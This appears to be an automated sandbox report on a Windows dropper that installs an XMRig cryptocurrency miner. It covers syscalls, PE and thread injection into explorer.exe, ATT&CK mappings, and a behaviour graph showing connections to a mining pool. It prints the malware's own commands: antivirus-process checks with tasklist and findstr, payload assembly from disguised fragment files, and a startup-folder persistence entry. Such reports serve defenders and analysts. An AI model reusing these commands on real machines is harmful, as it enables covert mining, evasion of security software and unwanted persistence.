              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA132DE0 FindFirstFileExW,17_2_00007FF7AA132DE0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA16CE3C GetFileAttributesW,FindFirstFileW,FindClose,17_2_00007FF7AA16CE3C
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752042DE0 FindFirstFileExW,20_2_00007FF752042DE0
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75207CE3C GetFileAttributesW,FindFirstFileW,FindClose,20_2_00007FF75207CE3C
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA0F5C44 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,17_2_00007FF7AA0F5C44
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\29442Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\29442\Jump to behavior
              Source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPX2
              Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA0F3B64 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,17_2_00007FF7AA0F3B64
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA115A40 GetLastError,IsDebuggerPresent,OutputDebugStringW,17_2_00007FF7AA115A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA1341A8 GetProcessHeap,17_2_00007FF7AA1341A8
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_000002453CA21160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,17_2_000002453CA21160
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA12AD08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF7AA12AD08
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA138E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF7AA138E74
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA115850 SetUnhandledExceptionFilter,17_2_00007FF7AA115850
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA11566C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF7AA11566C
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752025850 SetUnhandledExceptionFilter,20_2_00007FF752025850
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75202566C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00007FF75202566C
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75203AD08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00007FF75203AD08
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752048E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00007FF752048E74
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 21_2_0000014D5CA91160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,21_2_0000014D5CA91160

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 163.172.171.111 10343Jump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtProtectVirtualMemory: Direct from: 0x7FF7AA12B26CJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtClose: Direct from: 0x7FF7AA16C3CD
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtQueryInformationToken: Direct from: 0x7FF752093508Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtQueryAttributesFile: Direct from: 0x7FF7AA16D642Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtProtectVirtualMemory: Direct from: 0x7FF7AA16C119Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtReadFile: Direct from: 0x7FF7AA0F7D7FJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtQuerySystemInformation: Direct from: 0x7FF7AA16C4ADJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtClose: Direct from: 0x7FF75207C5C7
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtQueryAttributesFile: Direct from: 0x7FF7AA16CE4EJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtDelayExecution: Direct from: 0x7FF752011C92Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtOpenFile: Direct from: 0x7FF7AA16BF1EJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtDelayExecution: Direct from: 0x7FF7AA16DFD8Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtProtectVirtualMemory: Direct from: 0x7FF7AA118FF0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtClose: Direct from: 0x7FF7AA16CE61
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtProtectVirtualMemory: Direct from: 0x7FF7520083B5Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtQuerySystemInformation: Direct from: 0x7FF8C88A26A1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtClose: Direct from: 0x7FF7AA0F8693
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtQuerySystemInformation: Direct from: 0x7FF752024924Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtQueryAttributesFile: Direct from: 0x7FF75207D642Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtProtectVirtualMemory: Direct from: 0x7FF75203B26CJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtQueryAttributesFile: Direct from: 0x7FF75207CE4EJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtSetInformationFile: Direct from: 0x7FF7AA0F7A79Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtClose: Direct from: 0x7FF7AA16C5C7
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtQuerySystemInformation: Direct from: 0x7FF75207C4ADJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtCreateFile: Direct from: 0x7FF7AA0F787CJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtDelayExecution: Direct from: 0x7FF75207DFD8Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtDelayExecution: Direct from: 0x7FF7AA101C92Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtWriteFile: Direct from: 0x7FF7AA16B9D7Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtClose: Direct from: 0x7FF75207C37B
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtQuerySystemInformation: Direct from: 0x7FF7AA114924Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtSetInformationFile: Direct from: 0x7FF7AA0F7A91Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtProtectVirtualMemory: Direct from: 0x7FF752028FF0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtClose: Direct from: 0x7FF7AA16C200
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtClose: Direct from: 0x7FF75207FD06
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtUnmapViewOfSection: Direct from: 0x7FF7AA16C4BDJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtQueryAttributesFile: Direct from: 0x7FF7AA16C1E1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtMapViewOfSection: Direct from: 0x7FF7AA16C508Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtOpenFile: Direct from: 0x7FF7AA16C37BJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrNtMapViewOfSection: Direct from: 0x7FF75207C4BDJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtQueryInformationToken: Direct from: 0x7FF7AA183508Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comNtProtectVirtualMemory: Direct from: 0x7FF7AA0F83B5Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comMemory written: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com base: 2453CA20000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrMemory written: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr base: 14D5CA90000 value starts with: 4D5AJump to behavior
              Injects code into the Windows Explorer (explorer.exe)
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comMemory written: PID: 6504 base: 140000000 value: 4DJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comMemory written: PID: 6504 base: 140001000 value: NUJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comMemory written: PID: 6504 base: 1406F5000 value: DFJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comMemory written: PID: 6504 base: 1408F6000 value: 00Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comMemory written: PID: 6504 base: 11E1010 value: 00Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrMemory written: PID: 3524 base: 140000000 value: 4DJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrMemory written: PID: 3524 base: 140001000 value: NUJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrMemory written: PID: 3524 base: 1406F5000 value: DFJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrMemory written: PID: 3524 base: 1408F6000 value: 00Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrMemory written: PID: 3524 base: C94010 value: 00Jump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comThread register set: target process: 3640Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrThread register set: target process: 4148Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comThread register set: target process: 6504Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrThread register set: target process: 3524Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA0F3B64 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,17_2_00007FF7AA0F3B64
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA114364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00007FF7AA114364
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmdJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 29442Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized lJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com Reynolds.com lJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com C:\Users\user\AppData\Local\Temp\29442\Reynolds.comJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M"Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\wendy + ..\psychiatry + ..\rid + ..\games + ..\norway + ..\matching + ..\jungle + ..\elliott + ..\jpg + ..\americans + ..\exhibits + ..\peeing + ..\typical + ..\innocent + ..\seafood + ..\nervous + ..\households + ..\ai + ..\hotel + ..\holdem + ..\drums + ..\carlo + ..\tm + ..\landscape + ..\resolutions + ..\def + ..\lambda + ..\biodiversity + ..\odds + ..\smithsonian + ..\blvd + ..\actual + ..\guy + ..\expert + ..\delaware + ..\eagle + ..\eugene + ..\exempt + ..\same + ..\ebooks + ..\individuals + ..\sucking + ..\chan + ..\turns + ..\satin + ..\dealing + ..\result + ..\through + ..\realized l
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Windows\System32\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url" & echo url="c:\users\user\appdata\local\cybersphere dynamics\zeuschat.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\wendy + ..\psychiatry + ..\rid + ..\games + ..\norway + ..\matching + ..\jungle + ..\elliott + ..\jpg + ..\americans + ..\exhibits + ..\peeing + ..\typical + ..\innocent + ..\seafood + ..\nervous + ..\households + ..\ai + ..\hotel + ..\holdem + ..\drums + ..\carlo + ..\tm + ..\landscape + ..\resolutions + ..\def + ..\lambda + ..\biodiversity + ..\odds + ..\smithsonian + ..\blvd + ..\actual + ..\guy + ..\expert + ..\delaware + ..\eagle + ..\eugene + ..\exempt + ..\same + ..\ebooks + ..\individuals + ..\sucking + ..\chan + ..\turns + ..\satin + ..\dealing + ..\result + ..\through + ..\realized lJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Windows\System32\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url" & echo url="c:\users\user\appdata\local\cybersphere dynamics\zeuschat.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url" & exitJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA15DB9C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,17_2_00007FF7AA15DB9C
              Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69AFF5000.00000004.00000001.00020000.00000000.sdmp, Reynolds.com, 0000000A.00000000.2066014740.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp, ZeusChat.scr, 00000010.00000000.2205059109.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: conhost.exe, 00000013.00000002.3264667857.000001CAE0321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: Reynolds.com, conhost.exe, 00000013.00000002.3264667857.000001CAE0321000.00000002.00000001.00040000.00000000.sdmp, ZeusChat.scrBinary or memory string: Shell_TrayWnd
              Source: conhost.exe, 00000013.00000002.3264667857.000001CAE0321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: conhost.exe, 00000013.00000002.3264667857.000001CAE0321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA12FBB0 cpuid 17_2_00007FF7AA12FBB0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_000002453CA2A660 GetModuleHandleW,GetProcAddress,GetSystemTimeAsFileTime,17_2_000002453CA2A660
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA1324E0 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,17_2_00007FF7AA1324E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		1
              Scripting              		1
              Exploitation for Privilege Escalation              		1
              Deobfuscate/Decode Files or Information              		11
              Input Capture              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		1
              Abuse Elevation Control Mechanism              		LSASS Memory3
              File and Directory Discovery              		Remote Desktop Protocol11
              Input Capture              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter              		2
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		2
              Obfuscated Files or Information              		Security Account Manager17
              System Information Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook412
              Process Injection              		1
              DLL Side-Loading              		NTDS31
              Security Software Discovery              		Distributed Component Object ModelInput Capture1
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
              Registry Run Keys / Startup Folder              		121
              Masquerading              		LSA Secrets1
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Virtualization/Sandbox Evasion              		Cached Domain Credentials4
              Process Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items412
              Process Injection              		DCSync11
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561926 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 75 xmr-eu2.nanopool.org 2->75 77 DqnJUgbSFuO.DqnJUgbSFuO 2->77 91 Malicious sample detected (through community Yara rule) 2->91 93 Yara detected Xmrig cryptocurrency miner 2->93 95 Sigma detected: Search for Antivirus process 2->95 99 4 other signatures 2->99 11 file.exe 70 2->11         started        15 wscript.exe 1 2->15         started        signatures3 97 DNS related to crypt mining pools 75->97 process4 file5 67 C:\Users\user\AppData\Local\Tempbehaviorgraphuy, DOS 11->67 dropped 69 C:\Users\user\AppData\Local\Temp\Wendy, data 11->69 dropped 71 C:\Users\user\AppData\Local\Temp\Typical, data 11->71 dropped 73 46 other files (45 malicious) 11->73 dropped 117 Writes many files with high entropy 11->117 17 cmd.exe 3 11->17         started        119 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->119 21 ZeusChat.scr 15->21         started        signatures6 process7 file8 55 C:\Users\user\AppData\Local\...\Reynolds.com, PE32+ 17->55 dropped 81 Drops PE files with a suspicious file extension 17->81 83 Writes many files with high entropy 17->83 23 Reynolds.com 4 17->23         started        27 cmd.exe 2 17->27         started        29 conhost.exe 17->29         started        35 6 other processes 17->35 85 Modifies the context of a thread in another process (thread injection) 21->85 87 Injects a PE file into a foreign processes 21->87 89 Found direct / indirect Syscall (likely to bypass EDR) 21->89 31 ZeusChat.scr 21->31         started        33 ZeusChat.scr 21->33         started        signatures9 process10 file11 57 C:\Users\user\AppData\Local\...\ZeusChat.scr, PE32+ 23->57 dropped 59 C:\Users\user\AppData\Local\...\ZeusChat.js, ASCII 23->59 dropped 61 C:\Users\user\AppData\Local\...\M, data 23->61 dropped 107 Drops PE files with a suspicious file extension 23->107 109 Modifies the context of a thread in another process (thread injection) 23->109 111 Writes many files with high entropy 23->111 115 2 other signatures 23->115 37 Reynolds.com 23->37         started        40 cmd.exe 2 23->40         started        63 C:\Users\user\AppData\Local\Temp\29442\l, data 27->63 dropped 113 Injects code into the Windows Explorer (explorer.exe) 31->113 43 explorer.exe 1 31->43         started        signatures12 process13 file14 101 Injects code into the Windows Explorer (explorer.exe) 37->101 103 Modifies the context of a thread in another process (thread injection) 37->103 45 explorer.exe 1 37->45         started        65 C:\Users\user\AppData\...\ZeusChat.url, MS 40->65 dropped 49 conhost.exe 40->49         started        105 Found strings related to Crypto-Mining 43->105 51 conhost.exe 43->51         started        signatures15 process16 dnsIp17 79 xmr-eu2.nanopool.org 163.172.171.111, 10343, 49735 OnlineSASFR United Kingdom 45->79 121 System process connects to network (likely due to code injection or exploit) 45->121 53 conhost.exe 45->53         started        signatures18 process19

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\29442\Reynolds.com0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Tech0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              xmr-eu2.nanopool.org
              		163.172.171.111
              		truefalse
                		high
                DqnJUgbSFuO.DqnJUgbSFuO
                		unknown
                		unknowntrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.virustotal.com/en/search/?query=explorer.exe, 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://ocsp.entrust.net03file.exefalse
                      		high
                      http://ocsp.entrust.net02file.exefalse
                        		high
                        http://ocsp.cloudflare.com/origin_ca0explorer.exe, 00000012.00000003.2611556085.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354580125.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264505846.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703373555.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3265796424.0000000005480000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013C3000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
